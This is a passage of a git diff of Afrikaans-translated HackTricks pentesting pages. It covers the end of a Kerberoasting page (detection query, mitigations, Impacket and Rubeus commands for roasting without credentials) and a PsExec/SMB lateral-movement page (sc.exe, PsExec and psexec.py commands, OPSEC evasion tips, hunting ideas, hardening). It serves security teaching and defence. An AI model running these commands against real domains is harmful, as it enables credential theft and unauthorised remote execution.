Get-WinEvent -FilterHashtable @{Logname='Security'; ID=4769} -MaxEvents 1000 |
Where-Object {
($_.Message -notmatch 'krbtgt') -and
($_.Message -notmatch '\$$') -and
($_.Message -match 'Failure Code:\s+0x0') -and
($_.Message -match 'Ticket Encryption Type:\s+(0x17|0x12|0x11)') -and
($_.Message -notmatch '\$@')
} |
Select-Object -ExpandProperty Message
```
Additional ideas:
- Baseline normale SPN gebruik per gasheer/gebruiker; waarsku oor groot uitbarstings van verskillende SPN versoeke van 'n enkele prinsiep.
- Merk ongewone RC4 gebruik in AES-versterkte domeine.
### Mitigering / Versterking
- Gebruik gMSA/dMSA of masjien rekeninge vir dienste. Gemanagte rekeninge het 120+ karakter random wagwoorde en draai outomaties, wat offline kraking onprakties maak.
- Handhaaf AES op diens rekeninge deur `msDS-SupportedEncryptionTypes` op AES-slegs (desimaal 24 / hex 0x18) in te stel en dan die wagwoord te draai sodat AES sleutels afgelei kan word.
- Waar moontlik, deaktiveer RC4 in jou omgewing en monitor vir pogings tot RC4 gebruik. Op DC's kan jy die `DefaultDomainSupportedEncTypes` registriewaarde gebruik om standaarde vir rekeninge sonder `msDS-SupportedEncryptionTypes` in te stel. Toets deeglik.
- Verwyder onnodige SPNs van gebruikersrekeninge.
- Gebruik lang, random diensrekening wagwoorde (25+ karakters) as gemanagte rekeninge nie haalbaar is; verbied algemene wagwoorde en oudit gereeld.
### Kerberoast sonder 'n domein rekening (AS-aangevraagde STs)
In September 2022 het Charlie Clark gewys dat as 'n prinsiep nie vooraf-verifikasie vereis nie, dit moontlik is om 'n dienskaartjie te verkry via 'n vervaardigde KRB_AS_REQ deur die sname in die versoekliggaam te verander, wat effektief 'n dienskaartjie eerder as 'n TGT verkry. Dit weerspieël AS-REP rooster en vereis nie geldige domein geloofsbriewe nie.
Sien besonderhede: Semperis skrywe “Nuwe Aanvalspaaie: AS-aangevraagde STs”.
> [!WARNING]
> Jy moet 'n lys van gebruikers verskaf omdat jy sonder geldige geloofsbriewe nie LDAP met hierdie tegniek kan ondervra nie.
Linux
- Impacket (PR #1413):
```bash
GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile users.txt -dc-host dc.domain.local domain.local/
```
Windows
- Rubeus (PR #139):
```powershell
Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:domain.local /dc:dc.domain.local /nopreauth:NO_PREAUTH_USER /spn:TARGET_SERVICE
```
Related
As jy AS-REP roastable gebruikers te teiken, sien ook:
{{#ref}}
asreproast.md
{{#endref}}
## References
- [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting)
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled)
- Microsoft Security Blog (2024-10-11) Microsoft se leiding om te help om Kerberoasting te verminder: https://www.microsoft.com/en-us/security/blog/2024/10/11/microsofts-guidance-to-help-mitigate-kerberoasting/
- SpecterOps Rubeus Roasting dokumentasie: https://docs.specterops.io/ghostpack/rubeus/roasting
{{#include ../../banners/hacktricks-training.md}}

29
src/windows-hardening/lateral-movement/psexec-and-winexec.md
View File

@ -9,13 +9,13 @@ Hierdie tegnieke misbruik die Windows Service Control Manager (SCM) op afstand o
1. Verifieer by die teiken en toegang tot die ADMIN$ deel oor SMB (TCP/445).
2. Kopieer 'n uitvoerbare lêer of spesifiseer 'n LOLBAS-opdraglyn wat die diens sal uitvoer.
3. Skep 'n diens op afstand via SCM (MS-SCMR oor \PIPE\svcctl) wat na daardie opdrag of binêre wys.
4. Begin die diens om die payload uit te voer en opsioneel stdin/stdout via 'n benoemde pyp te vang.
4. Begin die diens om die payload uit te voer en opsioneel stdin/stdout via 'n benoemde pyplyn vas te vang.
5. Stop die diens en maak skoon (verwyder die diens en enige gelaat binêre).
Vereistes/voorvereistes:
- Plaaslike Administrateur op die teiken (SeCreateServicePrivilege) of eksplisiete diens skeppingsregte op die teiken.
- SMB (445) bereikbaar en ADMIN$ deel beskikbaar; Afstanddiensbestuur toegelaat deur die gasvuurmuur.
- UAC Afstandbeperkings: met plaaslike rekeninge kan tokenfiltrering admin oor die netwerk blokkeer tensy die ingeboude Administrateur of LocalAccountTokenFilterPolicy=1 gebruik word.
- SMB (445) bereikbaar en ADMIN$ deel beskikbaar; Afstandsdiensbestuur toegelaat deur die gasvuurmuur.
- UAC Afstandsbeperkings: met plaaslike rekeninge kan tokenfiltrering admin oor die netwerk blokkeer tensy die ingeboude Administrator of LocalAccountTokenFilterPolicy=1 gebruik word.
- Kerberos teen NTLM: die gebruik van 'n hostname/FQDN stel Kerberos in staat; verbinding deur IP val dikwels terug na NTLM (en kan geblokkeer word in geharde omgewings).
### Handmatige ScExec/WinExec via sc.exe
@ -35,7 +35,7 @@ sc.exe \\TARGET delete HTSvc
```
Notas:
- Verwacht 'n tydsduur fout wanneer 'n nie-diens EXE begin; uitvoering gebeur steeds.
- Om meer OPSEC-vriendelik te bly, verkies filielose opdragte (cmd /c, powershell -enc) of verwyder gelaaide artefakte.
- Om meer OPSEC-vriendelik te bly, verkies fileless opdragte (cmd /c, powershell -enc) of verwyder gelaaide artefakte.
Vind meer gedetailleerde stappe in: https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/
@ -60,11 +60,11 @@ PsExec64.exe -accepteula \\HOST -r WinSvc$ -s cmd.exe /c ipconfig
\\live.sysinternals.com\tools\PsExec64.exe -accepteula \\HOST -s cmd.exe /c whoami
```
OPSEC
- Laat diens installasie/ontinstallasie gebeurtenisse agter (Diensnaam dikwels PSEXESVC tensy -r gebruik word) en skep C:\Windows\PSEXESVC.exe tydens uitvoering.
- Laat diensinstallasie/ontinstallasie gebeurtenisse agter (diensnaam dikwels PSEXESVC tensy -r gebruik word) en skep C:\Windows\PSEXESVC.exe tydens uitvoering.
### Impacket psexec.py (PsExec-agtig)
- Gebruik 'n ingebedde RemCom-agtige diens. Laat 'n tydelike diens binêre (dikwels gerandomiseerde naam) val via ADMIN$, skep 'n diens (standaard dikwels RemComSvc), en proxy I/O oor 'n benoemde pyp.
- Gebruik 'n ingebedde RemCom-agtige diens. Laat 'n tydelike diens-binary val (gewoonlik gerandomiseerde naam) via ADMIN$, skep 'n diens (standaard dikwels RemComSvc), en proxy I/O oor 'n benoemde pyp.
```bash
# Password auth
psexec.py DOMAIN/user:Password@HOST cmd.exe
@ -114,29 +114,31 @@ Tipiese gasheer/netwerk artefakte wanneer PsExec-agtige tegnieke gebruik word:
- Registrasie artefak vir Sysinternals EULA: HKCU\Software\Sysinternals\PsExec\EulaAccepted=0x1 op die operateur gasheer (indien nie onderdruk nie).
Jag idees
- Alarmering op diens installs waar die ImagePath cmd.exe /c, powershell.exe, of TEMP plekke insluit.
- Waak op diens installs waar die ImagePath cmd.exe /c, powershell.exe, of TEMP plekke insluit.
- Soek na proses skep waar ParentImage C:\Windows\PSEXESVC.exe is of kinders van services.exe wat as LOCAL SYSTEM shell uitvoer.
- Merk naam pype wat eindig op -stdin/-stdout/-stderr of bekende PsExec kloon pyp name.
## Probleemoplossing algemene mislukkings
- Toegang is geweier (5) wanneer dienste geskep word: nie werklik plaaslike admin nie, UAC afstand beperkings vir plaaslike rekeninge, of EDR tampering beskerming op die diens binêre pad.
- Die netwerk pad is nie gevind nie (53) of kon nie met ADMIN$ verbind nie: firewall blokkeer SMB/RPC of admin deel is gedeaktiveer.
- Kerberos misluk, maar NTLM is geblokkeer: verbind met hostname/FQDN (nie IP nie), verseker behoorlike SPNs, of verskaf -k/-no-pass met kaartjies wanneer Impacket gebruik word.
- Diens begin tydens uitloop, maar payload het gedra: verwag as dit nie 'n werklike diens binêre is nie; vang uitvoer in 'n lêer of gebruik smbexec vir lewendige I/O.
- Kerberos misluk maar NTLM is geblokkeer: verbind met hostname/FQDN (nie IP nie), verseker behoorlike SPNs, of verskaf -k/-no-pass met kaartjies wanneer Impacket gebruik word.
- Diens begin neem te lank maar payload het gedra: verwag as dit nie 'n werklike diens binêre is nie; vang uitvoer in 'n lêer of gebruik smbexec vir lewendige I/O.
## Versterking notas (moderne veranderinge)
- Windows 11 24H2 en Windows Server 2025 vereis SMB ondertekening standaard vir uitgaande (en Windows 11 inkomende) verbindings. Dit breek nie wettige PsExec gebruik met geldige krediete nie, maar voorkom ongetekende SMB relay misbruik en kan toestelle beïnvloed wat nie ondertekening ondersteun nie.
## Versterking notas
- Windows 11 24H2 en Windows Server 2025 vereis SMB ondertekening standaard vir uitgaande (en Windows 11 inkomende) verbindings. Dit breek nie wettige PsExec gebruik met geldige kredensiaal nie, maar voorkom ongetekende SMB relay misbruik en kan toestelle beïnvloed wat nie ondertekening ondersteun nie.
- Nuwe SMB kliënt NTLM blokkering (Windows 11 24H2/Server 2025) kan NTLM terugval voorkom wanneer verbind met IP of na nie-Kerberos bedieners. In versterkte omgewings sal dit NTLM-gebaseerde PsExec/SMBExec breek; gebruik Kerberos (hostname/FQDN) of stel uitsonderings in indien wettig nodig.
- Beginsels van minste voorreg: minimaliseer plaaslike admin lidmaatskap, verkies Just-in-Time/Just-Enough Admin, handhaaf LAPS, en monitor/alarmeer op 7045 diens installs.
- Beginsels van minste voorreg: minimaliseer plaaslike admin lidmaatskap, verkies Just-in-Time/Just-Enough Admin, handhaaf LAPS, en monitor/waak op 7045 diens installs.
## Sien ook
- WMI-gebaseerde afstand exec (dikwels meer lêervry):
- WMI-gebaseerde afstand exec (dikwels meer fileless):
{{#ref}}
./wmiexec.md
{{#endref}}
- WinRM-gebaseerde afstand exec:
{{#ref}}
./winrm.md
{{#endref}}
@ -147,4 +149,5 @@ Jag idees
- PsExec - Sysinternals | Microsoft Learn: https://learn.microsoft.com/sysinternals/downloads/psexec
- SMB sekuriteit versterking in Windows Server 2025 & Windows 11 (ondertekening standaard, NTLM blokkering): https://techcommunity.microsoft.com/blog/filecab/smb-security-hardening-in-windows-server-2025--windows-11/4226591
{{#include ../../banners/hacktricks-training.md}}